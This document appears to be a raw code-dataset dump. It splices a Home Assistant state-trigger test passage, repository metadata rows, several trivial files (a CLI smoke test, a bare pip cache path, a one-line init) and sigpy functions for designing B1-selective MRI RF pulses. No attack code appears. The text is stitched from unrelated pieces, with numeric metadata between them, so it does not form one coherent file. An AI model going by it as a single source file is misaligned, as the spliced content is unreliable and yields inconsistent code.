"entity_id": "test.entity_1",
},
"action": {"service": "test.automation"},
},
{
"trigger": {
"platform": "state",
"to": "world",
"entity_id": "test.entity_2",
},
"action": {"service": "test.automation"},
},
],
},
)
await hass.async_block_till_done()
# use contexts to identify trigger entities
context_0 = Context()
context_1 = Context()
context_2 = Context()
# automation with match_all triggers on creation
hass.states.async_set("test.entity_0", "any", context=context_0)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context.parent_id == context_0.id
# create entities, trigger on test.entity_2 ('to' matches, no 'from')
hass.states.async_set("test.entity_1", "hello", context=context_1)
hass.states.async_set("test.entity_2", "world", context=context_2)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].context.parent_id == context_2.id
# removal of both, trigger on test.entity_1 ('from' matches, no 'to')
assert hass.states.async_remove("test.entity_1", context=context_1)
assert hass.states.async_remove("test.entity_2", context=context_2)
await hass.async_block_till_done()
assert len(calls) == 3
assert calls[2].context.parent_id == context_1.id
# automation with match_all triggers on removal
assert hass.states.async_remove("test.entity_0", context=context_0)
await hass.async_block_till_done()
assert len(calls) == 4
assert calls[3].context.parent_id == context_0.id
async def test_if_fires_on_for_condition(hass, calls):
"""Test for firing if condition is on."""
point1 = dt_util.utcnow()
point2 = point1 + timedelta(seconds=10)
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = point1
hass.states.async_set("test.entity", "on")
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "state",
"entity_id": "test.entity",
"state": "on",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
# not enough time has passed
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# Time travel 10 secs into the future
mock_utcnow.return_value = point2
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_for_condition_attribute_change(hass, calls):
"""Test for firing if condition is on with attribute change."""
point1 = dt_util.utcnow()
point2 = point1 + timedelta(seconds=4)
point3 = point1 + timedelta(seconds=8)
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = point1
hass.states.async_set("test.entity", "on")
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "state",
"entity_id": "test.entity",
"state": "on",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
# not enough time has passed
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# Still not enough time has passed, but an attribute is changed
mock_utcnow.return_value = point2
hass.states.async_set(
"test.entity", "on", attributes={"mock_attr": "attr_change"}
)
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# Enough time has now passed
mock_utcnow.return_value = point3
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fails_setup_for_without_time(hass, calls):
"""Test for setup failure if no time is provided."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "bla"},
"condition": {
"platform": "state",
"entity_id": "test.entity",
"state": "on",
"for": {},
},
"action": {"service": "test.automation"},
}
},
)
async def test_if_fails_setup_for_without_entity(hass, calls):
"""Test for setup failure if no entity is provided."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"event_type": "bla"},
"condition": {
"platform": "state",
"state": "on",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
async def test_wait_template_with_trigger(hass, calls):
"""Test using wait template with 'trigger.entity_id'."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
},
"action": [
{"wait_template": "{{ is_state(trigger.entity_id, 'hello') }}"},
{
"service": "test.automation",
"data_template": {
"some": "{{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
)
)
},
},
],
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
hass.states.async_set("test.entity", "hello")
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "state - test.entity - hello - world"
async def test_if_fires_on_entities_change_no_overlap(hass, calls):
"""Test for firing on entities change with no overlap."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": {"seconds": 5},
},
"action": {
"service": "test.automation",
"data_template": {"some": "{{ trigger.entity_id }}"},
},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity_1", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=10)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "test.entity_1"
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=10)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["some"] == "test.entity_2"
async def test_if_fires_on_entities_change_overlap(hass, calls):
"""Test for firing on entities change with overlap."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": {"seconds": 5},
},
"action": {
"service": "test.automation",
"data_template": {"some": "{{ trigger.entity_id }}"},
},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity_1", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "hello")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "test.entity_1"
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["some"] == "test.entity_2"
async def test_if_fires_on_change_with_for_template_1(hass, calls):
"""Test for firing on change with for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": "{{ 5 }}"},
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_change_with_for_template_2(hass, calls):
"""Test for firing on change with for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": "{{ 5 }}",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_change_with_for_template_3(hass, calls):
"""Test for firing on change with for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": "00:00:{{ 5 }}",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_change_from_with_for(hass, calls):
"""Test for firing on change with from/for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "media_player.foo",
"from": "playing",
"for": "00:00:30",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("media_player.foo", "playing")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "paused")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "stopped")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(minutes=1))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_not_fires_on_change_from_with_for(hass, calls):
"""Test for firing on change with from/for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "media_player.foo",
"from": "playing",
"for": "00:00:30",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("media_player.foo", "playing")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "paused")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "playing")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(minutes=1))
await hass.async_block_till_done()
assert len(calls) == 0
async def test_invalid_for_template_1(hass, calls):
"""Test for invalid for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": "{{ five }}"},
},
"action": {"service": "test.automation"},
}
},
)
with patch.object(state_trigger, "_LOGGER") as mock_logger:
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert mock_logger.error.called
async def test_if_fires_on_entities_change_overlap_for_template(hass, calls):
"""Test for firing on entities change with overlap and for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": '{{ 5 if trigger.entity_id == "test.entity_1"'
" else 10 }}",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "{{ trigger.entity_id }} - {{ trigger.for }}"
},
},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity_1", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "hello")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "test.entity_1 - 0:00:05"
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
mock_utcnow.return_value += timedelta(seconds=5)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["some"] == "test.entity_2 - 0:00:10"
async def test_attribute_if_fires_on_entity_change_with_both_filters(hass, calls):
"""Test for firing if both filters are match attribute."""
hass.states.async_set("test.entity", "bla", {"name": "hello"})
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
"attribute": "name",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "bla", {"name": "world"})
await hass.async_block_till_done()
assert len(calls) == 1
async def test_attribute_if_not_fires_on_entities_change_with_for_after_stop(
hass, calls
):
"""Test for not firing on entity change with for after stop trigger."""
hass.states.async_set("test.entity", "bla", {"name": "hello"})
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
"attribute": "name",
"for": 5,
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
# Test that the for-check works
hass.states.async_set("test.entity", "bla", {"name": "world"})
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=2))
hass.states.async_set("test.entity", "bla", {"name": "world", "something": "else"})
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
# Now remove state while inside "for"
hass.states.async_set("test.entity", "bla", {"name": "hello"})
hass.states.async_set("test.entity", "bla", {"name": "world"})
await hass.async_block_till_done()
assert len(calls) == 1
hass.states.async_remove("test.entity")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
| 34.083624 | 87 | 0.546233 | 4,172 | 39,128 | 4.854746 | 0.043384 | 0.051842 | 0.071196 | 0.096623 | 0.909055 | 0.896662 | 0.881406 | 0.854498 | 0.830503 | 0.807594 | 0 | 0.009119 | 0.332959 | 39,128 | 1,147 | 88 | 34.113339 | 0.766897 | 0.016638 | 0 | 0.661475 | 0 | 0 | 0.15261 | 0.009344 | 0 | 0 | 0 | 0 | 0.115265 | 1 | 0.002077 | false | 0 | 0.010384 | 0 | 0.013499 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e4059f085f069dff6597f0d3a182195fd1a0a044 | 65 | py | Python | tests/test_ap_project.py | jackeiel/2019sp-ap_project-jackeiel | 5671d0c40d84a7a4169a7a913f55996912fbc61d | [
"BSD-2-Clause"
] | null | null | null | tests/test_ap_project.py | jackeiel/2019sp-ap_project-jackeiel | 5671d0c40d84a7a4169a7a913f55996912fbc61d | [
"BSD-2-Clause"
] | null | null | null | tests/test_ap_project.py | jackeiel/2019sp-ap_project-jackeiel | 5671d0c40d84a7a4169a7a913f55996912fbc61d | [
"BSD-2-Clause"
] | null | null | null |
from ap_project.cli import main
def test_main():
main([])
| 9.285714 | 31 | 0.661538 | 10 | 65 | 4.1 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215385 | 65 | 6 | 32 | 10.833333 | 0.803922 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7c0f9352f64cbb0487f84b14a78f39a4453e6144 | 18 | py | Python | project/7.26-7.27/t/c1.py | mintlov3r/oh-my-python | b99e65ebe31926d92d825d8ad3294e970d9dc722 | [
"Apache-2.0"
] | null | null | null | project/7.26-7.27/t/c1.py | mintlov3r/oh-my-python | b99e65ebe31926d92d825d8ad3294e970d9dc722 | [
"Apache-2.0"
] | null | null | null | project/7.26-7.27/t/c1.py | mintlov3r/oh-my-python | b99e65ebe31926d92d825d8ad3294e970d9dc722 | [
"Apache-2.0"
] | null | null | null | a = 1
b = 2
c = 3 | 6 | 6 | 0.333333 | 6 | 18 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0.5 | 18 | 3 | 7 | 6 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7c13d91224f0a420dd0bb8baa98e7a47fc4a9b59 | 96 | py | Python | venv/lib/python3.8/site-packages/distlib/index.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/distlib/index.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/distlib/index.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/51/f7/22/98d5b5f4007b20a59a9b855a25b5ee081bc0aca7d2c61575e84c1abf31 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.416667 | 0 | 96 | 1 | 96 | 96 | 0.479167 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7cb5458518d6d73ad0c3454f914c7422f4288579 | 24 | py | Python | lungs_ml/__init__.py | dumaevrinat/lung_diseases | caa24a0c263e82106f585b7bcb0c57417fc9a06a | [
"MIT"
] | 3 | 2021-05-09T01:50:41.000Z | 2022-01-06T08:07:48.000Z | lungs_ml/__init__.py | dumaevrinat/lung_diseases | caa24a0c263e82106f585b7bcb0c57417fc9a06a | [
"MIT"
] | null | null | null | lungs_ml/__init__.py | dumaevrinat/lung_diseases | caa24a0c263e82106f585b7bcb0c57417fc9a06a | [
"MIT"
] | null | null | null | from .lungs_ml import *
| 12 | 23 | 0.75 | 4 | 24 | 4.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 24 | 1 | 24 | 24 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7cfef4f68c654a34f1bd273f8e65d80cb4c8ca53 | 9,774 | py | Python | sigpy/mri/rf/b1sel.py | kmjohnson3/sigpy | 6d5f9c66f7446a13b3615c31446bbce8adc5dfaa | [
"BSD-3-Clause"
] | 196 | 2018-07-07T00:42:42.000Z | 2022-03-22T02:30:24.000Z | sigpy/mri/rf/b1sel.py | kmjohnson3/sigpy | 6d5f9c66f7446a13b3615c31446bbce8adc5dfaa | [
"BSD-3-Clause"
] | 79 | 2018-10-12T19:53:21.000Z | 2022-03-30T13:44:41.000Z | sigpy/mri/rf/b1sel.py | kmjohnson3/sigpy | 6d5f9c66f7446a13b3615c31446bbce8adc5dfaa | [
"BSD-3-Clause"
] | 68 | 2018-09-26T03:46:42.000Z | 2022-03-11T03:51:49.000Z | # -*- coding: utf-8 -*-
""":math:`B_1^{+}`-selective RF Pulse Design functions.
"""
import numpy as np
from sigpy.mri.rf import slr as slr
from sigpy.mri.rf.util import dinf
__all__ = ['dz_b1_rf', 'dz_b1_gslider_rf', 'dz_b1_hadamard_rf']
def dz_b1_rf(dt=2e-6, tb=4, ptype='st', flip=np.pi / 6, pbw=0.3,
pbc=2, d1=0.01, d2=0.01, os=8, split_and_reflect=True):
"""Design a :math:`B_1^{+}`-selective excitation pulse following Grissom \
JMR 2014
Args:
dt (float): hardware sampling dwell time in s.
tb (int): time-bandwidth product.
ptype (string): pulse type, 'st' (small-tip excitation), 'ex' (pi/2
excitation pulse), 'se' (spin-echo pulse), 'inv' (inversion), or
'sat' (pi/2 saturation pulse).
flip (float): flip angle, in radians.
pbw (float): width of passband in Gauss.
pbc (float): center of passband in Gauss.
d1 (float): passband ripple level in :math:`M_0^{-1}`.
d2 (float): stopband ripple level in :math:`M_0^{-1}`.
os (int): matrix scaling factor.
split_and_reflect (bool): option to split and reflect designed pulse.
Split-and-reflect preserves pulse selectivity when scaled to excite large
tip-angles.
Returns:
2-element tuple containing
- **om1** (*array*): AM waveform.
- **dom** (*array*): FM waveform (radians/s).
References:
Grissom, W., Cao, Z., & Does, M. (2014).
:math:`B_1^{+}`-selective excitation pulse design using the Shinnar-Le
Roux algorithm. Journal of Magnetic Resonance, 242, 189-196.
"""
# calculate beta filter ripple
[_, d1, d2] = slr.calc_ripples(ptype, d1, d2)
# calculate pulse duration
b = 4257 * pbw
pulse_len = tb / b
# calculate number of samples in pulse
n = int(np.ceil(pulse_len / dt / 2) * 2)
if pbc == 0:
# we want passband as close to zero as possible.
# do my own dual-band filter design to minimize interaction
# between the left and right bands
# build system matrix
A = np.exp(1j * 2 * np.pi *
np.outer(np.arange(-n * os / 2, n * os / 2),
np.arange(-n / 2, n / 2)) / (n * os))
# build target pattern
ii = np.arange(-n * os / 2, n * os / 2) / (n * os) * 2
w = dinf(d1, d2) / tb
f = np.asarray([0, (1 - w) * (tb / 2),
(1 + w) * (tb / 2),
n / 2]) / (n / 2)
d = np.double(np.abs(ii) < f[1])
ds = np.double(np.abs(ii) > f[2])
# shift the target pattern to minimum center position
pbc = int(np.ceil((f[2] - f[1]) * n * os / 2 + f[1] * n * os / 2))
dl = np.roll(d, pbc)
dr = np.roll(d, -pbc)
dsl = np.roll(ds, pbc)
dsr = np.roll(ds, -pbc)
# build error weight vector
w = dl + dr + d1 / d2 * np.multiply(dsl, dsr)
# solve for the dual-band filter
AtA = A.conj().T @ np.multiply(np.reshape(w, (np.size(w), 1)), A)
Atd = A.conj().T @ np.multiply(w, dr - dl)
h = np.imag(np.linalg.pinv(AtA) @ Atd)
else: # normal design
# design filter
h = slr.dzls(n, tb, d1, d2)
# dual-band-modulate the filter
om = 2 * np.pi * 4257 * pbc # modulation frequency
t = np.arange(0, n) * pulse_len / n - pulse_len / 2
h = 2 * h * np.sin(om * t)
if split_and_reflect:
# split and flip fm waveform to improve large-tip accuracy
dom = np.concatenate((h[n // 2::-1], h, h[n:n // 2:-1])) / 2
else:
dom = np.concatenate((0 * h[n // 2::-1], h, 0 * h[n:n // 2:-1]))
# scale to target flip, convert to Hz
dom = dom * flip / (2 * np.pi * dt)
# build am waveform
om1 = np.concatenate((-np.ones(n // 2), np.ones(n), -np.ones(n // 2)))
return om1, dom
def dz_b1_gslider_rf(dt=2e-6, g=5, tb=12, ptype='st', flip=np.pi / 6,
pbw=0.5, pbc=2, d1=0.01, d2=0.01, split_and_reflect=True):
"""Design a :math:`B_1^{+}`-selective excitation gSlider pulse following
Grissom JMR 2014.
Args:
dt (float): hardware sampling dwell time in s.
g (int): number of slabs to be acquired.
tb (int): time-bandwidth product.
ptype (string): pulse type, 'st' (small-tip excitation), 'ex' (pi/2
excitation pulse), 'se' (spin-echo pulse), 'inv' (inversion), or
'sat' (pi/2 saturation pulse).
flip (float): flip angle, in radians.
pbw (float): width of passband in Gauss.
pbc (float): center of passband in Gauss.
d1 (float): passband ripple level in :math:`M_0^{-1}`.
d2 (float): stopband ripple level in :math:`M_0^{-1}`.
split_and_reflect (bool): option to split and reflect designed pulse.
Split-and-reflect preserves pulse selectivity when scaled to excite large
tip-angles.
Returns:
2-element tuple containing
- **om1** (*array*): AM waveform.
- **dom** (*array*): FM waveform (radians/s).
References:
Grissom, W., Cao, Z., & Does, M. (2014).
:math:`B_1^{+}`-selective excitation pulse design using the Shinnar-Le
Roux algorithm. Journal of Magnetic Resonance, 242, 189-196.
"""
# calculate beta filter ripple
[_, d1, d2] = slr.calc_ripples(ptype, d1, d2)
# if ptype == 'st':
bsf = flip
# calculate pulse duration
b = 4257 * pbw
pulse_len = tb / b
# calculate number of samples in pulse
n = int(np.ceil(pulse_len / dt / 2) * 2)
om = 2 * np.pi * 4257 * pbc # modulation freq to center profile at pbc
t = np.arange(0, n) * pulse_len / n - pulse_len / 2
om1 = np.zeros((2 * n, g))
dom = np.zeros((2 * n, g))
for gind in range(1, g + 1):
# design filter
h = bsf*slr.dz_gslider_b(n, g, gind, tb, d1, d2, np.pi, n // 4)
# modulate filter to center and add it to a time-reversed and modulated
# copy, then take the imaginary part to get an odd filter
h = np.imag(h * np.exp(1j * om * t) - h[n::-1] * np.exp(1j * -om * t))
if split_and_reflect:
# split and flip fm waveform to improve large-tip accuracy
dom[:, gind - 1] = np.concatenate((h[n // 2::-1],
h, h[n:n // 2:-1])) / 2
else:
dom[:, gind - 1] = np.concatenate((0 * h[n // 2::-1],
h, 0 * h[n:n // 2:-1]))
# build am waveform
om1[:, gind - 1] = np.concatenate((-np.ones(n // 2), np.ones(n),
-np.ones(n // 2)))
# scale to target flip, convert to Hz
dom = dom / (2 * np.pi * dt)
return om1, dom
def dz_b1_hadamard_rf(dt=2e-6, g=8, tb=16, ptype='st', flip=np.pi / 6,
pbw=2, pbc=2, d1=0.01, d2=0.01, split_and_reflect=True):
"""Design a :math:`B_1^{+}`-selective Hadamard-encoded pulse following \
Grissom JMR 2014.
Args:
dt (float): hardware sampling dwell time in s.
g (int): number of slabs to be acquired.
tb (int): time-bandwidth product.
ptype (string): pulse type, 'st' (small-tip excitation), 'ex' (pi/2 \
excitation pulse), 'se' (spin-echo pulse), 'inv' (inversion), or \
'sat' (pi/2 saturation pulse).
flip (float): flip angle, in radians.
pbw (float): width of passband in Gauss.
pbc (float): center of passband in Gauss.
d1 (float): passband ripple level in :math:`M_0^{-1}`.
d2 (float): stopband ripple level in :math:`M_0^{-1}`.
split_and_reflect (bool): option to split and reflect designed pulse.
Split-and-reflect preserves pulse selectivity when scaled to excite large
tip-angles.
Returns:
2-element tuple containing
- **om1** (*array*): AM waveform.
- **dom** (*array*): FM waveform (radians/s).
References:
Grissom, W., Cao, Z., & Does, M. (2014).
:math:`B_1^{+}`-selective excitation pulse design using the Shinnar-Le
Roux algorithm. Journal of Magnetic Resonance, 242, 189-196.
"""
# calculate beta filter ripple
[_, d1, d2] = slr.calc_ripples(ptype, d1, d2)
bsf = flip
# calculate pulse duration
b = 4257 * pbw
pulse_len = tb / b
# calculate number of samples in pulse
n = int(np.ceil(pulse_len / dt / 2) * 2)
# modulation frequency to center profile at pbc gauss
om = 2 * np.pi * 4257 * pbc
t = np.arange(0, n) * pulse_len / n - pulse_len / 2
om1 = np.zeros((2 * n, g))
dom = np.zeros((2 * n, g))
for gind in range(1, g + 1):
# design filter
h = bsf*slr.dz_hadamard_b(n, g, gind, tb, d1, d2, n // 4)
# modulate filter to center and add it to a time-reversed and modulated
# copy, then take the imaginary part to get an odd filter
h = np.imag(h * np.exp(1j * om * t) - h[n::-1] * np.exp(1j * -om * t))
if split_and_reflect:
# split and flip fm waveform to improve large-tip accuracy
dom[:, gind - 1] = np.concatenate((h[n // 2::-1],
h,
h[n:n // 2:-1])) / 2
else:
dom[:, gind - 1] = np.concatenate((0 * h[n // 2::-1],
h,
0 * h[n:n // 2:-1]))
# build am waveform
om1[:, gind - 1] = np.concatenate((-np.ones(n // 2), np.ones(n),
-np.ones(n // 2)))
# scale to target flip, convert to Hz
dom = dom / (2 * np.pi * dt)
return om1, dom
